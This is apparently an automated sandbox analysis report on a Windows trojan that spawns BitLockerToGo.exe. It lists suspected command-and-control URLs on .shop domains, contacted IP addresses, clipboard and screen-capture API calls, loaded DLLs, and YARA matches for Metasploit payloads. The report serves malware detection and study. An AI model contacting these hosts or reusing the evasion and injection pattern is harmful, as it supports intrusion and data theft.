            Source: l5u4ezxr.u51.exeString found in binary or memory: https://login.microsoftonline.com/METRIC_AZURERM_API_REQUEST_BUCKETSlabel
            Source: l5u4ezxr.u51.exeString found in binary or memory: https://management.azure.comfailed
            Source: l5u4ezxr.u51.exeString found in binary or memory: https://ossrdbms-aad.database.chinacloudapi.cned25519:
            Source: BitLockerToGo.exe, 00000001.00000003.1768083504.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tenseddrywsqio.shop/M
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/.
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1797722828.00000000027F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/api
            Source: BitLockerToGo.exe, 00000001.00000002.1797722828.00000000027F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/apiK
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/api_
            Source: BitLockerToGo.exe, 00000001.00000002.1797722828.00000000027F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/apibul
            Source: BitLockerToGo.exe, 00000001.00000002.1797722828.00000000027D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/fXx
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop:443/apii
            Source: l5u4ezxr.u51.exeString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comNtQuerySystemInformationAllo
            Source: l5u4ezxr.u51.exeString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
            Source: BitLockerToGo.exe, 00000001.00000003.1785814274.0000000002871000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1786075321.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.0000000002870000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownHTTPS traffic detected: 104.21.69.149:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004292F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004292F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004292F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004292F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00421460 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,1_2_00421460

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1761754559.0000000002786000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: Process Memory Space: l5u4ezxr.u51.exe PID: 6528, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004321F01_2_004321F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040C2231_2_0040C223
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004323E31_2_004323E3
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042D7021_2_0042D702
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004040001_2_00404000
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041F0111_2_0041F011
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004340301_2_00434030
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042C8901_2_0042C890
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040D9781_2_0040D978
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040B9001_2_0040B900
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004341101_2_00434110
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004061F01_2_004061F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004089F01_2_004089F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004209801_2_00420980
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004359901_2_00435990
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00413A4A1_2_00413A4A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040E20B1_2_0040E20B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041CA101_2_0041CA10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00419A1F1_2_00419A1F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00407A301_2_00407A30
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00401AD51_2_00401AD5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041D2901_2_0041D290
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041BB221_2_0041BB22
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041A3301_2_0041A330
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004043C01_2_004043C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004353C01_2_004353C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043238A1_2_0043238A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00433BA81_2_00433BA8
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00433C401_2_00433C40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004344501_2_00434450
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004024101_2_00402410
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004144201_2_00414420
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00411CDA1_2_00411CDA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004324BC1_2_004324BC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041AD701_2_0041AD70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004335D21_2_004335D2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00404DE01_2_00404DE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041EDFE1_2_0041EDFE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00433D901_2_00433D90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004235B01_2_004235B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00420E601_2_00420E60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040FE011_2_0040FE01
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004016181_2_00401618
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00406ED01_2_00406ED0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00407EE01_2_00407EE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00431E801_2_00431E80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004096A01_2_004096A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004356B01_2_004356B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00433F401_2_00433F40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041D7521_2_0041D752
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040CF601_2_0040CF60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004147701_2_00414770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004317101_2_00431710
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_004057801_2_00405780
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00409CD0 appears 87 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 004093E0 appears 38 times
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1759379021.00000000015E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLauncher!.exe pP vs l5u4ezxr.u51.exe
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.000000000274C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs l5u4ezxr.u51.exe
            Source: l5u4ezxr.u51.exeBinary or memory string: OriginalFilenameLauncher!.exe pP vs l5u4ezxr.u51.exe
            Source: l5u4ezxr.u51.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1761754559.0000000002786000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: Process Memory Space: l5u4ezxr.u51.exe PID: 6528, type: MEMORYSTRMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@3/2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042D5B9 CoCreateInstance,SysAllocString,1_2_0042D5B9
            Source: l5u4ezxr.u51.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: l5u4ezxr.u51.exeVirustotal: Detection: 21%
            Source: l5u4ezxr.u51.exeString found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine unixpacket(BADINDEX)%!(NOVERB)complex128ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtra12207031256103515625ParseFloatt.Kind == RIPEMD-160SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1IP addressPOSTALCODEexecerrdotSYSTEMROOTChannel %spick_first:authoritygrpc.Recv.grpc.Sent."INTERNAL"OutOfRangeConnectionlocal-addrRST_STREAMEND_STREAMSet-Cookie; Expires=; Max-Age=; HttpOnly stream=%dset-cookieuser-agentkeep-aliveconnectionequivalentHost: %s
            Source: l5u4ezxr.u51.exeString found in binary or memory: ... omitting SubConn(id:%d)"OUT_OF_RANGE"ALREADY_EXISTSContent-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM; SameSite=LaxERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eof{$} not at endempty wildcardparsing %q: %wunknown error unknown code: Not Acceptable.WithoutCancel.WithDeadline(reserved_rangefield_presence> closed by </\.+*?()|[]{}^$bad record MAC.in-addr.arpa.unknown mode: key is invalidheap_sys_bytesRequestTimeoutRequestExpiredzero parametervault.azure.cnGetSystemTimesControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWnot a PNG filemime/multipart%s Channel #%dgrpc-trace-bintoo_many_pingsunknown ID: %vAuthInfo: '%s'show_sensitiveAccept-CharsetDkim-Signatureneed more dataREQUEST_METHODNOT_ENOUGH_FOOprotobuf errorInstEmptyWidthprefix length not an ip:portinvalid PrefixRCodeNameErrorResourceHeaderresourceGroups" out of rangeadd_dir_headerStaticProvidercloud.adc-e.ukcsp.hci.ic.govap-northeast-1ap-northeast-2ap-northeast-3ap-southeast-1ap-southeast-2ap-southeast-3ap-southeast-4Europe (Milan)Europe (Spain)Europe (Paris)US East (Ohio)fips-ca-west-1fips-us-east-1fips-us-east-2fips-us-west-1fips-us-west-2ca-west-1-fipsus-east-1-fipsus-east-2-fipsus-west-1-fipsus-west-2-fipsamplifybackendapi.ecr-publicbackup-gatewayclouddirectorycloudformationlocalhost:8000edge.sagemakerfips-ap-east-1fips-eu-west-1fips-eu-west-2fips-eu-west-3fips-sa-east-1emr-containersemr-serverlessprod-ca-west-1prod-us-east-1prod-us-east-2prod-us-west-1prod-us-west-2identity-chimeiotthingsgraphapi-ap-south-1data-eu-west-1data-us-east-1data-us-west-2kendra-rankingap-east-1-fipseu-west-1-fipseu-west-2-fipseu-west-3-fipssa-east-1-fipslookoutmetricsmediapackagev2meetings-chimenetworkmanagerroute53domainsruntime-v2-lexsecretsmanagerserverlessreposervicecatalogsimspaceweaverstoragegatewayworkspaces-webcn-northwest-1api-cn-north-1aws-iso-globalus-isob-east-1eu-isoe-west-1^cn\-\w+\-\d+$dtls fatal: %vRecordOverflowBadCertificateCLICOLOR_FORCEinvalid kind: formnovalidate$htmltemplate_ /* %s */null MessageOptionsServiceOptionsprotobuf_oneofXXX_OneofFuncsXXX_extensionsLOGGER_UNKNOWNReservedRangesfailed to castunknown node: ApplyFunction;DifferentialD;DoubleLeftTee;DoubleUpArrow;LeftTeeVector;LeftVectorBar;LessFullEqual;LongLeftArrow;Longleftarrow;NotTildeEqual;NotTildeTilde;Poincareplane;PrecedesEqual;PrecedesTilde;RightArrowBar;RightTeeArrow;RightTriangle;RightUpVector;SucceedsEqual;SucceedsTilde;SupersetEqual;UpEquilibrium;VerticalTilde;VeryThinSpace;bigtriangleup;blacktriangle;divideontimes;fallingdotseq;hookleftarrow;leftarrowtail;leftharpoonup;longleftarrow;looparrowleft;measuredangle;ntriangleleft;shortparallel;smallsetminus;triangleright;upharpoonleft;NotEqualTilde;varsubsetneqq;varsupsetneqq;len of type %soffline_accessdocument startseque
            Source: l5u4ezxr.u51.exeString found in binary or memory: extension %v does not implement protoreflect.ExtensionTypeDescriptorexpected SCALAR, SEQUENCE-START, MAPPING-START, or ALIAS, but got %vinvalid relocation information. Base Relocation SizeOfBlock too largereflect: embedded interface with unexported method(s) not implementedhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)%s matches more methods than %s, but has a more specific path pattern%s matches fewer methods than %s, but has a more general path patterntls: peer doesn't support the certificate custom signature algorithmstls: handshake message of length %d bytes exceeds maximum of %d bytes%w: %q has %d variable labels named %q but %d values %q were providedrpc.Register: method %q has %d input parameters; needs exactly three
            Source: l5u4ezxr.u51.exeString found in binary or memory: Estimated total CPU time spent performing GC tasks on processors (as defined by GOMAXPROCS) dedicated to those tasks. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent running user Go code. This may also include some small amount of time spent in the Go runtime. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time goroutines spent performing GC tasks to assist the GC and prevent it from falling behind the application. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent returning unused memory to the underlying platform in response eagerly in response to memory pressure. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent performing tasks that return unused memory to the underlying platform. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics. Sum of all metrics in /cpu/classes/scavenge.Count of small allocations that are packed together into blocks. These allocations are counted separately from other allocations because each individual allocation is not tracked by the runtime, only their block. Each block is already accounted for in allocs-by-size and frees-by-size.Approximate cumulative time goroutines have spent blocked on a sync.Mutex, sync.RWMutex, or runtime-internal lock. This metric is useful for identifying global changes in lock contention. Collect a mutex or block profile using the runtime/pprof package for more detailed contention data.Estimated total available CPU time not spent executing any Go or Go runtime code. In other words, the part of /cpu/classes/total:cpu-seconds that was unused. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Memory allocated from the heap that is reserved for stack space, whether or not it is currently in-use. Currently, this represents all stack memory for goroutines. It also includes all OS thread stacks in non-cgo programs. Note that stacks may be allocated differently in the future, and this may change.Distribution of individual non-GC-related stop-the-world pause latencies. This is the time from deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (measured directly in /sched/pauses/stopping/other:seconds). Bucket counts increase monotonically.Distribution of individual GC-related stop-the-world stopping latencies. This is the time it takes from deciding to stop the world until all Ps are stopped. This is a subse
            Source: l5u4ezxr.u51.exeString found in binary or memory: Estimated total CPU time spent performing GC tasks on processors (as defined by GOMAXPROCS) dedicated to those tasks. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent running user Go code. This may also include some small amount of time spent in the Go runtime. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time goroutines spent performing GC tasks to assist the GC and prevent it from falling behind the application. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent returning unused memory to the underlying platform in response eagerly in response to memory pressure. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Estimated total CPU time spent performing tasks that return unused memory to the underlying platform. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics. Sum of all metrics in /cpu/classes/scavenge.Count of small allocations that are packed together into blocks. These allocations are counted separately from other allocations because each individual allocation is not tracked by the runtime, only their block. Each block is already accounted for in allocs-by-size and frees-by-size.Approximate cumulative time goroutines have spent blocked on a sync.Mutex, sync.RWMutex, or runtime-internal lock. This metric is useful for identifying global changes in lock contention. Collect a mutex or block profile using the runtime/pprof package for more detailed contention data.Estimated total available CPU time not spent executing any Go or Go runtime code. In other words, the part of /cpu/classes/total:cpu-seconds that was unused. This metric is an overestimate, and not directly comparable to system CPU time measurements. Compare only with other /cpu/classes metrics.Memory allocated from the heap that is reserved for stack space, whether or not it is currently in-use. Currently, this represents all stack memory for goroutines. It also includes all OS thread stacks in non-cgo programs. Note that stacks may be allocated differently in the future, and this may change.Distribution of individual non-GC-related stop-the-world pause latencies. This is the time from deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (measured directly in /sched/pauses/stopping/other:seconds). Bucket counts increase monotonically.Distribution of individual GC-related stop-the-world stopping latencies. This is the time it takes from deciding to stop the world until all Ps are stopped. This is a subse
            Source: l5u4ezxr.u51.exeString found in binary or memory: net/addrselect.go
            Source: l5u4ezxr.u51.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
            Source: l5u4ezxr.u51.exeString found in binary or memory: google.golang.org/grpc@v1.64.1/internal/balancerload/load.go
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeFile read: C:\Users\user\Desktop\l5u4ezxr.u51.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\l5u4ezxr.u51.exe "C:\Users\user\Desktop\l5u4ezxr.u51.exe"
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: l5u4ezxr.u51.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: l5u4ezxr.u51.exeStatic file information: File size 17182720 > 1048576
            Source: l5u4ezxr.u51.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x71b200
            Source: l5u4ezxr.u51.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x852800
            Source: l5u4ezxr.u51.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.000000000274C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1755794344.00000000027CD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.000000000274C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1755794344.00000000027CD000.00000004.00000020.00020000.00000000.sdmp
            Source: l5u4ezxr.u51.exeStatic PE information: section name: .symtab
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00439B1C push edx; retf 0040h1_2_00439B1D
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6892Thread sleep time: -60000s >= -30000sJump to behavior
